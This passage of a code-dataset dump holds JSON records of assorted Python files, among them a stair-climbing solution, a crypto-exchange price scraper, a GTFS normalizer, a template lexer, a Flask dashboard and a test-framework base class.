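    b = rng.normal(size=4)

    x = np.zeros(4)
    r = b - A @ x
    p = r.copy()
    rsold = r @ r
    for _ in range(20):
        Ap = A @ p
        alpha = rsold / (p @ Ap)
        x += alpha * p
        r -= alpha * Ap
        rsnew = r @ r
        if rsnew < 1e-12:
            break
        p = r + (rsnew / rsold) * p
        rsold = rsnew

    print(np.allclose(x, np.linalg.solve(A, b)))  # True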
+{"seq_id":"641262121","text":"# 假设你正在爬楼梯。需要 n 阶你才能到达楼顶。 \n# \n# 每次你可以爬 1 或 2 个台阶。你有多少种不同的方法可以爬到楼顶呢? \n# \n# 注意:给定 n 是一个正整数。 \n# \n# 示例 1: \n# \n# 输入: 2\n# 输出: 2\n# 解释: 有两种方法可以爬到楼顶。\n# 1. 1 阶 + 1 阶\n# 2. 2 阶 \n# \n# 示例 2: \n# \n# 输入: 3\n# 输出: 3\n# 解释: 有三种方法可以爬到楼顶。\n# 1. 1 阶 + 1 阶 + 1 阶\n# 2. 1 阶 + 2 阶\n# 3. 2 阶 + 1 阶\n# \n# Related Topics 动态规划 \n# 👍 1229 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# 方法1: 递归\nclass Solution:\n def climbStairs(self, n: int) -> int:\n if n <= 0:\n return 0\n # 避免重复递归,建立hash表\n hash_map = {1:1, 2:2, 3:3}\n # f1 = 1, f2 = 2, f3 = f1 + f2 = 3\n def backtrack(n):\n if n <= 3:\n return hash_map[n]\n\n if n not in hash_map:\n hash_map[n] = backtrack(n - 1) + backtrack(n - 2)\n return hash_map[n]\n\n backtrack(n)\n return hash_map[n]\n\n# 方法2: 迭代\nclass Solution:\n def climbStairs(self, n: int) -> int:\n if n <= 0:\n return 0\n if n <= 3:\n return n\n\n f1, f2, f3 = 1, 2, 3\n for i in range(4, n + 1):\n f1, f2 = f2, f3\n f3 = f1 + f2\n return f3\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_03/[70]爬楼梯.py","file_name":"[70]爬楼梯.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"535696049","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# from gevent import monkey\n# from gevent.queue import Queue\n# sqlstrs = Queue(maxsize=5000)\nimport numpy as np\nimport gevent\nimport sys\nimport traceback\n# monkey.patch_all()\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib3\nurllib3.disable_warnings()\nimport time\nfrom config import *\nimport threading\nimport json\nimport jubi_html_spider\nupdate_complement = [0]\nall_data = dict()\nfees = dict()\ncn_find = dict()\nhttp_pool = urllib3.PoolManager(70)\nfee_url = 'https://www.jubi.com/about/fee.html' # 费率\nallcoin_ticker = \"https://www.jubi.com/coin/allcoin\" #\"所有币种\"\nsingle_orders = \"https://www.jubi.com/api/v1/orders/\" #\"成交记录\"\nsingle_depths = \"https://www.jubi.com/coin/{0}/depth.js\" #\"深度\"\nsingle_kline = \"https://www.jubi.com/coin/{0}/k.js\"\nheaders = {\n \"Host\":\"www.jubi.com\",\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\",\n}\n\n\nclass CoinBase(threading.Thread):\n def __init__(self, name):\n threading.Thread.__init__(self, name=name)\n self.name = name\n self.order_pause_time = ORDERS_PAUSE_TIME\n self.last_tid = 0\n\n # 个体性\n self.fee = 0.001 # 手续费\n self.lsb = 0.01 # 币价最小单位\n\n\n # 每日\n self.day_open = 0 # 开盘\n self.day_open_set = 0\n self.average_volume = 0 # 平均交易额/s\n\n # 当前\n self.tickers = np.ndarray((2, TICKER_VECTOR_LENGTH)); self.tickers_index = 0\n self.tickers_stagnation = np.ndarray((2, TICKER_STAGNATION_LENGTH)); self.tickers_stagnation_index = 0\n self.orders = np.ndarray((5, ORDERS_VERTOR_LENGTH)); self.orders_index = 0\n self.depths = np.ndarray((2, DEPTHS_VECTOR_LENGTH)); self.depths_index = 0\n self.buy_one = 0\n self.sell_one = 0\n\n # 指标\n self.now_price = 0 # 当前价格\n self.current_increase = 0 # 当前日增长率\n self.now_volume = MIN_VALUE # 当前交易额\n self.volume_ratio = 0 # 与过去1天的平均每秒的交易额比例\n self.volume_percent = 0 # 交易额占比\n self.buy_indicator = 0 # 买入指数\n self.gradient = 0\n\n # 初始化\n\n self.init_lsb()\n # print('minest trade price interval is :' + str(self.lsb))\n self.start()\n\n # 不停的爬取orders\n def run(self):\n self.init_day_open()\n while True:\n acc_time = 0\n while acc_time < self.order_pause_time:\n acc_time += ORDERS_PAUSE_TIME_ITEM\n time.sleep(ORDERS_PAUSE_TIME_ITEM)\n try:\n rsp = http_pool.request('POST', single_orders, fields={'coin':self.name}, headers = headers)\n for trys in range(5):\n if rsp.status == 200:\n break\n rsp = http_pool.request('POST', single_orders, fields={'coin':self.name})\n else:\n print(self.name + 'spider orders error')\n continue\n rsp = json.loads(rsp.data.decode('utf-8'))\n for item in rsp:\n tid = int(item['tid'])\n if tid > self.last_tid:\n self.last_tid = tid\n date = int(item['date'])\n price = item['price']\n amount = item['amount']\n type = 1 if item['type'] == 'buy' else -1\n self.add_orders([tid, date, price, amount, type])\n # 统计当前交易量,当前交易量的显著水平\n current_time = time.time()\n bias = 1\n tmp_volume = 0\n while self.orders[1, self.orders_index - bias] + ORDERS_VOLUME_COUNT_TIME > current_time:\n tmp_volume += self.orders[2, self.orders_index - bias] * self.orders[3, self.orders_index - bias]\n bias += 1\n self.now_volume = tmp_volume /ORDERS_VOLUME_COUNT_TIME + MIN_VALUE\n self.volume_ratio = self.now_volume / self.average_volume\n # 计算下一次更新orders的时间\n expect_time = self.orders[1, self.orders_index - 1] - self.orders[1, self.orders_index - 1 - ORDERS_INTERVAL]\n self.order_pause_time = expect_time if expect_time < ORDERS_PAUSE_TIME_MAX else ORDERS_PAUSE_TIME_MAX\n 
# print(self.name + 'expect_time' + str(expect_time))\n zero_time = (time.time() + TZ8) % (3600 * 24)\n # 接近凌晨时将order更新时间加快\n if zero_time < 30 or (3600 * 24 - zero_time) < 30:\n self.order_pause_time = ORDERS_PAUSE_TIME_MIN\n except Exception as e:\n print(traceback.print_exc())\n pass\n\n\n\n\n def init_lsb(self):\n try:\n rsp = http_pool.request('POST', single_orders, fields={'coin': self.name})\n trys = 0\n if rsp.status != 200 and trys < 5:\n rsp = http_pool.request('POST', single_orders, fields={'coin': self.name})\n trys += 1\n rsp = json.loads(rsp.data.decode('utf-8'))\n rsp = np.array([item['price'] for item in rsp])\n tts = 0\n rsp = np.abs(rsp - np.round(rsp))\n while np.max(rsp) > 1e-6:\n tts += 1\n rsp *= 10\n rsp = np.abs(rsp - np.round(rsp))\n self.lsb = self.lsb / 10**tts\n\n except Exception as e:\n print(e)\n print(\"init the LSB error\" + self.name)\n self.lsb = 0.01\n\n def add_ticker(self, tick):\n self.now_price = tick[1]\n self.current_increase = self.now_price / self.day_open - 1\n if self.tickers_index % 10 == 0:\n pass\n # print(self.name + '_add ticker success_' + str(self.tickers_index))\n if self.tickers_index == TICKER_VECTOR_LENGTH:\n self.tickers[:, 0 : TICKER_VECTOR_LENGTH - TICKER_SUPPLEMENT_LENGTH] = self.tickers[:, TICKER_SUPPLEMENT_LENGTH : ]\n self.tickers_index = TICKER_VECTOR_LENGTH - TICKER_SUPPLEMENT_LENGTH\n self.tickers[:, self.tickers_index] = tick\n self.tickers_index += 1\n else:\n self.tickers[:, self.tickers_index] = tick\n self.tickers_index += 1\n if self.tickers_index >= 2 and self.tickers[1][self.tickers_index - 1] != self.tickers[1][self.tickers_index - 2]:\n self.order_pause_time = ORDERS_PAUSE_TIME_MIN\n\n\n\n # 增加一条交易记录\n def add_orders(self, order):\n if self.orders_index == ORDERS_VERTOR_LENGTH:\n self.orders[:, 0 : ORDERS_VERTOR_LENGTH - ORDERS_SUPPLEMENT_LENGTH] = self.orders[:, ORDERS_SUPPLEMENT_LENGTH :]\n self.orders_index = ORDERS_VERTOR_LENGTH - ORDERS_SUPPLEMENT_LENGTH\n self.orders[:, self.orders_index] = order\n self.orders_index += 1\n else:\n self.orders[:, self.orders_index] = order\n self.orders_index += 1\n if self.orders_index % 100 == 0:\n pass\n # print(self.name + 'add order success: ' + str(self.orders_index))\n # 运行程序时会初始化一下当天的开盘时间\n def init_day_open(self):\n try:\n kline_rsp = requests.get(single_kline.format(self.name))\n for trys in range(5):\n if kline_rsp.status_code == 200:\n break\n else:\n kline_rsp = requests.get(single_kline.format(self.name))\n else:\n print('init_day_open_http_error')\n kline_rsp = kline_rsp.text\n index = kline_rsp.find('{\"5m\"')\n kline_rsp = kline_rsp[index: -3]\n dic = json.loads(kline_rsp)\n self.day_open = float(dic['1d'][-1][2]) + MIN_VALUE\n except Exception as e:\n print(e)\n print('day open init failed in ' + self.name)\n self.day_open = MIN_VALUE\n\n\n\n\n\n\n\n\n\n\n\n\ndef spider_tickers():\n t_before = time.time()\n while True:\n t_behind = time.time()\n if t_behind - t_before < 1:\n time.sleep(t_behind - t_before)\n t_before = t_behind\n try:\n time.sleep(TICKER_PAUSE_TIME)\n rsp = requests.get(allcoin_ticker, headers = headers).json()\n # rsp = http_pool.request('GET', allcoin_ticker).data.decode('utf-8')\n # rsp = json.loads(rsp)\n # print(rsp)\n ticker_time = time.time()\n for (name, value) in rsp.items():\n if name in all_data.keys():\n update_complement[0] = [1] # 更新完成标志\n all_data[name].add_ticker([ticker_time, value[1]])\n all_data[name].buy_one = value[2]\n all_data[name].sell_one = value[3]\n day_begin = (ticker_time + TZ8) % (24 * 3600)\n 
all_data[name].average_volume = value[7] / 24 / 3600 + MIN_VALUE\n if day_begin < 10:\n if day_begin < 5:\n if not all_data[name].day_open_set:\n all_data[name].day_open = value[1]\n all_data[name].day_open_set = 1\n else:\n all_data[name].day_open_set = 0\n\n else: # 不存在则生成,生成的时候将手续费率也整进去\n all_data[name] = CoinBase(name)\n all_data[name].average_volume = value[7] / 24 / 3600 + MIN_VALUE\n all_data[name].day_open = value[1]\n all_data[name].add_ticker([ticker_time, value[1]])\n if value[0] in fees.keys():\n all_data[name].fee = fees[value[0]]\n else:\n rsp = requests.get(fee_url)\n trys = 0\n if rsp.status_code != 200 and trys < 5:\n rsp = requests.get(fee_url)\n trys += 1\n rsp = rsp.text\n soup = BeautifulSoup(rsp, 'lxml')\n dls = soup.find_all('dl', attrs={'class':'clear'})\n for dl in dls:\n dlc = dl.find_all('dd', attrs = {'class':'borderNone'}, limit = 2)\n fee = dlc[1].text\n try:\n fee = float(fee[0:-1])\n except:\n continue\n fees[dlc[0].text] = fee\n if value[0] == dlc[0].text:\n all_data[name].fee = fee / 100\n print('add table:' + name)\n except Exception as e:\n print(traceback.print_exc())\n\ndef main():\n # spider_tickers()\n t = threading.Thread(target=spider_tickers)\n t.start()\n t2 = jubi_html_spider.trade_main()\n\n\n\n # gevent.joinall(event)\n\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"jubiMain.py","file_name":"jubiMain.py","file_ext":"py","file_size_in_byte":11357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
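add_ticker and add_orders in jubiMain.py above implement the same fixed-capacity buffer: when the write index reaches the vector length, the newest entries are slid to the front and the oldest *_SUPPLEMENT_LENGTH entries are discarded. The pattern in isolation, with CAP and DROP as stand-ins for those config constants:

    import numpy as np

    CAP, DROP = 5, 2
    buf = np.zeros(CAP)
    idx = 0
    for v in range(1, 9):
        if idx == CAP:                   # full: keep only the newest CAP-DROP entries
            buf[:CAP - DROP] = buf[DROP:]
            idx = CAP - DROP
        buf[idx] = v
        idx += 1
    print(buf[:idx])                     # [5. 6. 7. 8.]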
+{"seq_id":"275426532","text":"\"\"\"Normalize a Gtfs.\"\"\"\nimport warnings\nfrom slugify import slugify\n\nimport pandas as pd\n\nfrom gtfstools.utils import showme, pandas_tools\nfrom gtfstools.config import normalize_settings as settings\nfrom gtfstools.gtfs.fill_columns.shapes import EstimateShapes\nfrom gtfstools.gtfs.fill_columns.stoptimes import EstimateStopTimes\n\n\nclass GtfsNormalizer(object):\n \"\"\"Normalize the dataframes from the zip file.\"\"\"\n\n def __init__(self, gtfs_dict, gtfs_path):\n \"\"\"Constructor.\n\n Args:\n -----\n gtfs_dict (dict): dict of dataframes from the zipfile.\n gtfs_path (str): path of the gtfszip.\n \"\"\"\n self.gtfs_dict = gtfs_dict\n self.dict_files = settings.DICT\n self.gtfs_path = gtfs_path\n\n @staticmethod\n def normalize_str(txt):\n \"\"\"Normalize a str.\n\n Args:\n -----\n txt (str): string to normalize.\n\n Returns:\n --------\n string normalized.\n \"\"\"\n try:\n return slugify(txt, separator=\" \")\n except TypeError as _:\n return txt\n\n def normalize_serie(self, serie):\n \"\"\"Normalize a dataframes column.\n\n Args:\n -----\n serie (pd.Serie): serie to normalize.\n\n Returns:\n --------\n serie normalized.\n \"\"\"\n return serie.map(self.normalize_str)\n\n def normalize_dataframe(self, frame, cols):\n \"\"\"Normalize all columns of a dataframe.\n\n Args:\n -----\n frame (pd.DataFrame): dataframe to normalize.\n cols (list): all columns required and optionals.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n for col in cols:\n if col in frame.columns:\n frame[col] = self.normalize_serie(frame[col])\n else:\n frame[col] = None\n\n return frame\n\n def agency(self):\n \"\"\"Normalize the agency.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"agency.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"agency.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def calendar(self):\n \"\"\"Normalize the Calendar.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"calendar.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"calendar.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def calendar_dates(self):\n \"\"\"Normalize the calendar_dates.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n if bool(\"calendar_dates.txt\" in self.gtfs_dict.keys()):\n return self.normalize_calendar_dates()\n else:\n return self.generate_calendar_dates()\n\n def normalize_calendar_dates(self):\n \"\"\"Normalize the calendar_dates.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"calendar_dates.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"calendar_dates.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n @staticmethod\n def generate_calendar_dates():\n \"\"\"Create an empty dataframe of calendar_dates.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n print(\"We don't have calendar_dates.txt in GTFS zip.\")\n frame = pd.DataFrame()\n frame.columns = [\"date\", \"service_id\", \"exception_type\"]\n\n return frame\n\n def routes(self):\n \"\"\"Normalize the routes.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n warnings.filterwarnings(\"ignore\")\n frame = self.gtfs_dict[\"routes.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n frame[\"sha\"] = (\n frame[\"route_long_name\"].map(str) +\n 
frame[\"route_short_name\"].map(str)\n )\n frame = frame.sort_values(by=\"sha\")\n\n def route_direction(serie):\n \"\"\"Change the name of the 2 routes in the same direction.\n\n Args:\n -----\n serie (pd.Serie): serie to update.\n\n Returns:\n --------\n serie updated.\n \"\"\"\n lst_index = list(serie.loc[serie.shift(-1) == serie].index)\n for idx in lst_index:\n serie.loc[idx] += \"_other_direction\"\n\n route_direction(frame[\"sha\"])\n cols = self.dict_files[\"routes.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def stops(self):\n \"\"\"Normalize the stops.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"stops.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"stops.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def stoptimes(self):\n \"\"\"Normalize the stoptimes.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"stop_times.txt\"].copy()\n\n def prepare_stop_times(frame):\n \"\"\"Fill the stoptimes missing.\n\n Args:\n -----\n frame (pd.DataFrame): dataframe to fill.\n\n Returns:\n --------\n dataframe filled.\n \"\"\"\n try:\n frame[\"arrival_time\"] = frame[\"arrival_time\"].map(time2seconds)\n frame[\"departure_time\"] = frame[\"departure_time\"].map(time2seconds)\n except TypeError as _:\n print(\"Some stoptimes are generating...\")\n frame = EstimateStopTimes.main(frame)\n\n return frame\n\n def time2seconds(tps):\n \"\"\"Transform time into seconds.\n\n Args:\n -----\n tps (str): time %h:%m:%s.\n\n Returns:\n --------\n seconds from time.\n \"\"\"\n try:\n hour, minute, second = map(int, str(tps).split(\":\"))\n sod = hour * 3600 + minute * 60 + second\n return sod\n except TypeError as _:\n return tps\n\n frame = prepare_stop_times(frame)\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"stop_times.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def trips(self):\n \"\"\"Normalize the trips.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"trips.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"trips.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def shapes(self, trips):\n \"\"\"Normalize the shapes.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n\n def have_all_shapes(trips):\n \"\"\"Does the shapes are all in the zipfile.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n bool if there are all shapes in the zip.\n \"\"\"\n trips_without_shapes = trips[trips[\"shape_id\"].isnull()]\n\n return bool(len(trips_without_shapes) == 0)\n\n if bool(\"shapes.txt\" in self.gtfs_dict.keys()):\n if have_all_shapes(trips):\n shapes = self.normalize_shapes()\n else:\n shapes, trips = self.fill_missing_shapes(trips)\n else:\n shapes, trips = self.generate_all_shapes(trips)\n\n return shapes, trips\n\n def normalize_shapes(self, frame=None):\n \"\"\"Normalize the shapes.\n\n Args:\n -----\n frame (pd.DataFrame): dataframe of shapes\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n if frame is None:\n frame = self.gtfs_dict[\"shapes.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"shapes.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def fill_missing_shapes(self, trips):\n \"\"\"Fill the missing shapes.\n\n 
Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n dataframe filled.\n \"\"\"\n\n def find_missing_shapes(trips):\n \"\"\"Determine the shapes missing.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n shapes available, shapes missing.\n \"\"\"\n available_shapes = trips[~trips[\"shape_id\"].isnull()]\n missing_shapes = trips[trips[\"shape_id\"].isnull()]\n msg = \"{} shapes on {} are generating...\"\n print(msg.format(len(missing_shapes), len(available_shapes)))\n\n return available_shapes, missing_shapes\n\n def complete_shapes(shapes, _shape):\n \"\"\"Concat the shapes real, and generated.\n\n Args:\n -----\n shapes (pd.DataFrame): shapes real.\n _shape (pd.DataFrame): shapes generated.\n\n Returns:\n --------\n dataframe which contains all the shapes.\n \"\"\"\n shapes = pd.concat([shapes, _shape])\n shapes = self.normalize_shapes(frame=shapes)\n\n return shapes\n\n available_shapes, missing_shapes = find_missing_shapes(trips)\n shapes = self.gtfs_dict[\"shapes.txt\"].copy()\n _shape, _trip = EstimateShapes(self.gtfs_path).main(missing_shapes)\n trips = pd.concat([available_shapes, _trip])\n shapes = complete_shapes(shapes, _shape)\n\n return shapes, trips\n\n def generate_all_shapes(self, trips):\n \"\"\"Generate missing shapes.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n shapes generated, trips with new shapes.\n \"\"\"\n shapes, trips = EstimateShapes(self.gtfs_path).main(trips)\n shapes = self.normalize_shapes(frame=shapes)\n\n return shapes, trips\n\n @showme.time\n def normalize(self):\n \"\"\"Normalize the gtfs.\n\n Returns:\n --------\n dict of dataframes.\n \"\"\"\n gtfs_dict = dict()\n gtfs_dict[\"agency.txt\"] = self.agency()\n gtfs_dict[\"calendar.txt\"] = self.calendar()\n gtfs_dict[\"calendar_dates.txt\"] = self.calendar_dates()\n gtfs_dict[\"routes.txt\"] = self.routes()\n gtfs_dict[\"stops.txt\"] = self.stops()\n gtfs_dict[\"stop_times.txt\"] = self.stoptimes()\n trips = self.trips()\n shapes, trips = self.shapes(trips)\n gtfs_dict[\"shapes.txt\"] = shapes\n gtfs_dict[\"trips.txt\"] = trips\n\n return gtfs_dict\n","sub_path":"gtfstools/gtfs/normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":11220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"378314241","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# A Lexer for our templates!\n\nimport re\nfrom collections import deque\n\nimport syntax\nfrom tokens import *\nfrom exc import TemplateSyntaxError\n\nc = lambda x: re.compile(x)\n_RE_MEGA = r'({0}.*?{1})|({2}.*?{3})|({4}.*?{5})'.format(*syntax.SYMBOLS)\n\n\nclass Token(object):\n \"\"\"\n Wrapper of each word Token seen in the source text.\n Along with the value of the token, some extra information is also\n stored as attributes.\n \"\"\"\n\n def __init__(self, value, line_no=None, col_no=None):\n # Lets get this thing working first.\n # Take care of line number, col number later!\n self.value = value\n self.line_no = line_no\n self.col_no = col_no\n self.type = self.get_token_type()\n\n def get_token_type(self):\n \"\"\"\n Analyse the token content and return the token type.\n \"\"\"\n token_begin = self.value[:2]\n token_end = self.value[-2:]\n token_set = (token_begin, token_end)\n if token_set[0] in syntax.SYMBOLS and token_set[1] in syntax.SYMBOLS:\n token_content = self.value[2:-2].strip()\n if token_content[:3] == 'end':\n token_type = TOKEN_BLOCK_END\n else:\n token_type = TOKEN_DICT.get(token_begin)\n self.check_token_syntax(token_type, token_content)\n else:\n token_type = TOKEN_HTML\n return token_type\n\n def clean(self):\n if self.type in [TOKEN_VAR, TOKEN_BLOCK]:\n return ''.join(self.value[2:-2].strip())\n return self.value\n\n def check_token_syntax(self, token_type, token_content):\n \"\"\"\n Some basic syntax analysis here, based on token types.\n \"\"\"\n if token_type == TOKEN_BLOCK_END and len(token_content.split()) > 1:\n raise TemplateSyntaxError('Invalid end token!')\n elif token_type == TOKEN_BLOCK:\n split = token_content.split()\n if split[0] not in syntax.KEYWORDS:\n raise TemplateSyntaxError('Invalid keyword - {0}'.format(\n split[0]))\n\n def __repr__(self):\n return '{0}'.format(self.value)\n\n\nclass Lexer(object):\n \"\"\"A Regex based Lexer.\"\"\"\n\n def __init__(self, source_text):\n self._source_text = source_text.strip()\n self._source_list = [\n e for e in re.split(_RE_MEGA, self._source_text) if e\n ]\n self._pos = 0\n self.current = TOKEN_INITIAL\n self._buffer = deque()\n\n def push(self, item):\n self._buffer.append(item)\n\n def peek(self):\n \"\"\"\n Look ahead in the current stream,\n and return the next token. This does not\n affect the stream iterator.\n \"\"\"\n pass\n\n def __iter__(self):\n \"\"\"\n Generator stream that returns the next token in our buffer.\n \"\"\"\n #if self._pos >= len(self._source_text):\n # raise StopIteration\n #else:\n # print(self._source_list)\n # import pdb; pdb.set_trace()\n for text in self._source_list:\n self.current = Token(text)\n yield self.current\n\n\ndef tokenize(source):\n return iter(Lexer(source))\n\n\nif __name__ == '__main__':\n\n source = \"\"\"\nHello, {{ name }}!!
\n\n {% for item in list %}\n {% if item %}\n {{ item }}
\n {% else %}\n {{ item }}
\n {% endif %}\n {% endfor %}\n\n\"\"\"\n lexer = Lexer(source)\n for i in lexer:\n print(i)\n","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"8764921","text":"import arcpy,sys, string, os, arcgisscripting\ngp = arcgisscripting.create(10.0)\nfc = gp.GetParameterAsText(0) \nfd = gp.GetParameterAsText(1)\nrows = arcpy.SearchCursor(fc)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\nvalues=[int(row.getValue(fd)) for row in rows]\t\t\nvalues.sort()\nfor i in range(1,max(values)):\n\tif i not in values:\n\t\tarcpy.AddMessage(str(i))\ndel rows","sub_path":"脚本/查找漏码.py","file_name":"查找漏码.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"164319767","text":"import requests\nfrom flask import Flask\n\napp = Flask(__name__)\n\napp.config.update(\n SECRET_KEY='A0Zr98j/3yX R~XHH!jmN]LWX/,?RT',\n DEBUG=False,\n HOST='localhost',\n PORT=8888,\n BRENDER_SERVER='localhost:9999'\n)\n\n\ndef check_connection(host_address):\n try:\n http_request(host_address, '/')\n return \"online\"\n except:\n return \"offline\"\n\n\ndef http_request(ip_address, method, post_params=False):\n \"\"\"Utils function used to communicate with the server\n \"\"\"\n if post_params:\n r = requests.post('http://' + ip_address + method, data=post_params)\n else:\n r = requests.get('http://' + ip_address + method)\n return r.json()\n\n\ndef list_integers_string(string_list):\n \"\"\"Accepts comma separated string list of integers\n \"\"\"\n integers_list = string_list.split(',')\n integers_list = map(int, integers_list)\n return integers_list\n\nfrom dashboard.controllers.main import main\nfrom dashboard.controllers.shots import shots\nfrom dashboard.controllers.workers import workers\nfrom dashboard.controllers.settings import settings\nfrom dashboard.controllers.shows import shows\napp.register_blueprint(main)\napp.register_blueprint(shots, url_prefix='/shots')\napp.register_blueprint(workers, url_prefix='/workers')\napp.register_blueprint(settings, url_prefix='/settings')\napp.register_blueprint(shows, url_prefix='/shows')\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('404_error.html'), 404\n\n\ndef run(user_config=None):\n config = app.config\n\n if user_config:\n config.from_object(user_config)\n\n config.update(\n SERVER_NAME=\"%s:%s\" % (config['HOST'], config['PORT'])\n )\n\n app.run(config['HOST'], config['PORT'])\n","sub_path":"brender/dashboard/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"298798354","text":"'''\nСписок [16, -17, 2, 78.7, False, False,\n{‘True’: True}, 555, 12, 23, 42, ‘DD’] \nФункция, принимает на вход список \n-выбирает из него все int и float \n-составить из него новый список,\nотсортированный от наименьшего значения большему.\n'''\ncpicok = [16, -17, 2, 78.7, False, False, {'True': True}, 555, 12, 23, 42, 'DD']\ndef filt(lis):\n\tcpicok2 =[\n\tbox\n\tfor box in lis\n\t\tif type(box) in [int,float]\n\t\t]\n\tcpicok2.sort()\n\treturn cpicok2\nprint(filt(cpicok))\n \n\n# не успел =(","sub_path":"HomeWork 2/HomeWork-13.py","file_name":"HomeWork-13.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"505151266","text":"import requests\nimport json\nimport uuid\nimport os, re\nfrom subprocess import Popen, PIPE\nfrom xml.etree.ElementTree import Element, SubElement, tostring\nfrom bs4 import BeautifulSoup\nfrom .client import Client\nimport logging\nimport time\nimport configparser\nfrom cockpit_testing.Framework.utils.blueprintExecutionTime import ExecutionTime\nfrom random import randint\nfrom cockpit_testing.Framework.utils.skiptest import skiptests\nclass BaseTest(object):\n def __init__(self):\n self.clone = False\n self.account = ''\n self.account_id = ''\n self.logging = logging\n #self.log()\n self.values = {'environment': '',\n 'username': '',\n 'password': '',\n 'location': '',\n 'account': '',\n 'cockpit_url': '',\n 'client_id': '',\n 'client_secret': '',\n 'jwt': '',\n 'repo': '',\n 'branch': '',\n 'threads_number': ''\n }\n self.get_config_values()\n # self.get_jwt()\n self.header = {'Authorization': 'bearer ' + self.values['jwt'],\n 'content-type': 'application/json'}\n\n self.Testcases_results = {'Blueprint Name': ['Test Result', 'Execution Time']}\n self.requests = requests\n self.execution_time = ExecutionTime\n self.skiptests=skiptests.copy()\n\n def setup(self):\n self.get_testcases_templates()\n\n if not self.values['password']:\n self.values['password'] = str(input(\"Please, Enter %s's password : \" % self.values['username']))\n\n def teardown(self):\n print(' [*] Execute teardown method .... ')\n # Delete account\n if not self.account_id:\n self.get_account_ID(account=self.account)\n\n api = 'https://' + self.values['environment'] + '/restmachine/cloudbroker/account/delete'\n client_header = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'}\n client_body = {'accountId': self.account_id,\n 'reason': 'TearDown by Cockpit Driver'}\n client_response = self.client._session.post(url=api, headers=client_header, data=client_body)\n if client_response.status_code == 200:\n self.logging.info('DONE: Delete %s account' % self.values['account'])\n print(' [*] DONE: Deleted %s account' % self.values['account'])\n else:\n client_response.raise_for_status()\n\n @staticmethod\n def random_string():\n return str(uuid.uuid4()).replace(\"-\", \"\")[:10]\n\n @staticmethod\n def random_integer(min_val, max_val):\n return randint(int(min_val), int(max_val))\n\n def build_api(self, api_list):\n api = self.values['cockpit_url'] + '/'\n for value in api_list:\n api += value + '/'\n return api[:-1]\n\n @staticmethod\n def build_json(data):\n # This method take dict data and return json data.\n return json.dumps(data)\n\n def get_config_values(self):\n script_dir = os.path.dirname(__file__)\n config_file = \"../../Config/config.ini\"\n config_path = os.path.join(script_dir, config_file)\n config = 